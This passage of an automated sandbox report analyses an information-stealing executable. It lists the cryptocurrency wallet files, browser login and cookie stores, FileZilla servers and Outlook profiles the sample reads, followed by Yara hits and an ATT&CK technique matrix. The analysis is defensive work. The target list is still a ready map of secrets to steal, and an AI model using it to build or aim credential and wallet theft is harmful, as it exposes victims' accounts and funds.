                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: cb41bc9329.exe PID: 6184, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        11
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        3
                        Obfuscated Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol4
                        Data from Local System
                        2
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        Logon Script (Windows)1
                        Scheduled Task/Job
                        12
                        Software Packing
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading
                        NTDS236
                        System Information Discovery
                        Distributed Component Object ModelInput Capture112
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading
                        LSA Secrets761
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials1
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Process Injection
                        DCSync251
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
